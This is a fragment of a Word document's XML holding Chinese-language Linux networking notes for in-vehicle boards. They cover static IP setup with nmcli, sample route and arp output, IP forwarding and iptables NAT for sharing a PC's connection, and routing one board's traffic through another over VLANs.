status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10、设置系统静态 IP 地址：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<![CDATA[nmcli connection modify <connection-name ipv4.addresses <ip-address/<subnet-mask ipv4.gateway <gateway ipv4.dns "<dns1>,<dns2>" ipv4.method manual>]]>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11、刷新网络接口获取新的 DHCP 地址：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nmcli device reapply &lt;interface-name&gt;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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>操作实例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>设备通过特定网卡上网</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>设备网络情况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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liauto@x01-orin1:~$ route</w:t>
              <w:br/>
              <w:t>Kernel IP routing table</w:t>
              <w:br/>
              <w:t>Destination     Gateway         Genmask         Flags Metric Ref    Use Iface</w:t>
              <w:br/>
              <w:t>default         172.31.60.54    0.0.0.0         UG    0      0        0 mgbe3_0.60</w:t>
              <w:br/>
              <w:t>172.30.3.0      0.0.0.0         255.255.255.0   U     0      0        0 mgbe1_0</w:t>
              <w:br/>
              <w:t>172.31.3.0      0.0.0.0         255.255.255.0   U     0      0        0 mgbe3_0.3</w:t>
              <w:br/>
              <w:t>172.31.10.0     0.0.0.0         255.255.255.0   U     0      0        0 mgbe3_0.10</w:t>
              <w:br/>
              <w:t>172.31.20.0     172.31.10.32    255.255.255.0   UG    0      0        0 mgbe3_0.10</w:t>
              <w:br/>
              <w:t>172.31.30.0     0.0.0.0         255.255.255.0   U     0      0        0 mgbe3_0.30</w:t>
              <w:br/>
              <w:t>172.31.50.0     0.0.0.0         255.255.255.0   U     0      0        0 mgbe3_0.50</w:t>
              <w:br/>
              <w:t>172.31.60.0     0.0.0.0         255.255.255.0   U     0      0        0 mgbe3_0.60</w:t>
              <w:br/>
              <w:t>172.31.70.0     0.0.0.0         255.255.255.0   U     0      0        0 mgbe3_0.70</w:t>
              <w:br/>
              <w:t>172.31.92.0     0.0.0.0         255.255.255.0   U     0      0        0 mgbe3_0.92</w:t>
              <w:br/>
              <w:br/>
              <w:t>liauto@x01-orin1:~$ ping www.baidu.com</w:t>
              <w:br/>
              <w:t>ping: www.baidu.com: Temporary failure in name resolution</w:t>
              <w:br/>
              <w:br/>
              <w:t>liauto@x01-orin1:~$ arp</w:t>
              <w:br/>
              <w:t>Address                  HWtype  HWaddress           Flags Mask            Iface</w:t>
              <w:br/>
              <w:t>172.31.3.193             ether   f4:a8:0d:b4:3f:e2   C                     mgbe3_0.3</w:t>
              <w:br/>
              <w:t>172.31.3.77                      (incomplete)                              mgbe3_0.3</w:t>
              <w:br/>
              <w:t>172.31.60.54                     (incomplete)                              mgbe3_0.60</w:t>
              <w:br/>
              <w:t>172.31.30.78                     (incomplete)                              mgbe3_0.30</w:t>
              <w:br/>
              <w:t>172.30.3.81              ether   02:00:00:00:ce:83   C                     mgbe1_0</w:t>
              <w:br/>
              <w:t>172.31.30.81             ether   02:00:00:00:ce:81   C                     mgbe3_0.30</w:t>
              <w:br/>
              <w:t>172.31.30.32                     (incomplete)                              mgbe3_0.30</w:t>
              <w:br/>
              <w:t>172.31.70.51                     (incomplete)                              mgbe3_0.70</w:t>
              <w:br/>
              <w:t>172.31.3.72              ether   02:00:00:00:ce:72   C                     mgbe3_0.3</w:t>
              <w:br/>
              <w:t>172.31.10.31                     (incomplete)                              mgbe3_0.10</w:t>
              <w:br/>
              <w:t>172.31.30.51                     (incomplete)                              mgbe3_0.30</w:t>
              <w:br/>
              <w:t>172.31.3.81              ether   02:00:00:00:ce:81   C                     mgbe3_0.3</w:t>
              <w:br/>
              <w:t>172.31.3.71              ether   02:00:00:00:ce:71   C                     mgbe3_0.3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设备通过电脑上的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>172.31.3.193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 网卡上网，需要将电脑配置为一个网络转发器（或者称为网络共享）。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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>电脑设置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以下是在Linux系统上设置网络共享的一般步骤：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启用 IP 转发：在 Linux 上，你需要确保 IP 转发功能已启用。你可以通过以下命令来检查：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bashCopy code</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo sysctl net.ipv4.ip_forward</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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如果输出为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>net.ipv4.ip_forward = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，表示 IP 转发被禁用。你可以通过编辑 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/etc/sysctl.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 文件并将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>net.ipv4.ip_forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的值设置为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来启用它：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bashCopy code</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo nano /etc/sysctl.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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在文件中找到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>net.ipv4.ip_forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行，并将其修改为：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Copy code</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>net.ipv4.ip_forward = 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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然后保存并关闭文件。要使更改生效，运行以下命令：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bashCopy code</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo sysctl -p</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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配置网络地址转换（NAT）：你需要设置 NAT 规则，将来自其他设备的流量转发到你的互联网连接。你可以使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来实现这一点。假设你的互联网连接是通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>172.31.3.193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 网卡连接的，你可以运行以下命令：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bashCopy code</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo iptables -t nat -A POSTROUTING -o &lt;your_internet_interface&gt; -j MASQUERADE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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其中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;your_internet_interface&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是你的互联网连接所使用的网卡接口，可能是你连接到互联网的那个接口，例如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>eth0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wlan0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enp0s3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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>设备上设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30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设置路由：在其他设备上设置默认网关为你电脑的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>172.31.3.193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 网卡的 IP 地址。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vbnetCopy code</w:t>
              <w:br/>
              <w:t>Default Gateway: 172.31.3.193</w:t>
              <w:br/>
              <w:t>Subnet Mask: Same as your subnet mask (e.g., 255.255.255.0)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>DNS Server: You can use public DNS servers like 8.8.8.8 or 1.1.1.1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1" w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>A板通过B板上网</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">11.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>车载以太网连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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A板和B板通过网卡连接eth0 - eth0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注意车载以太网不会自动更新arp，需要手动添加，各个供应商策略不一样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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">11.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>A板路由添加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vlan6  ip是192.168.6.9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而且发现 B板路由表里有这么一条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192.168.6.0   0.0.0.0  255.255.255.0   bridge6(vlan6)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说明A板vlan6 发送到的数据（源地址192.168.6.9）， 送达 B板一定会分发到 vlan6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上网目的ip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(1)route中 添加上网目的ip，指定vlan6 接口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route add -host  上网目的ip  dev vlan6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这样  （上网目的ip） 数据包是通过 vlan6 转发，源地址就是vlan6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(2)arp中 添加 添加上网目的ip MAC地址为B板的网卡MAC地址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arp -s   上网目的ip   B板的网卡MAC地址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这样  （上网目的ip数据包） 可以到达B板网卡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color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">11.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>B板上网</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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vlan6 可以转发上网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(1)由于A板vlan6过来数据（源地址192.168.6.9）,分发到vlan6，vlan6上网出去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一汽供应商 将vlan6转发到另外一个C板上网（也有直接B板上网上的）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(2)通过A B板可以发现，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数据通信接收都会经过 eth0,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数据通信接收、相响应在各自  eth0.x  bridgex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可以得出结论，所有接收数据都到实际物理网卡  eth0，通过 eth0分发到各个 vlan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eth0.x 和bridgex（桥接到eth0.x虚拟网卡）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3390">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33391">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33392">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33393">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33394">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33395">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33396">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33397">
    <w:lvl>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33398">
    <w:lvl>
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33399">
    <w:lvl>
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33400">
    <w:lvl>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33401">
    <w:lvl>
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33402">
    <w:lvl>
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33403">
    <w:lvl>
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33404">
    <w:lvl>
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33405">
    <w:lvl>
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33406">
    <w:lvl>
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="33390"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="33391"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="33392"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="33393"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="33394"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="33395"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="33396"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="33397"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="33398"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="33399"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="33400"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="33401"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="33402"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="33403"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="33404"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="33405"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="3340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2024-05-28T14:49:01Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>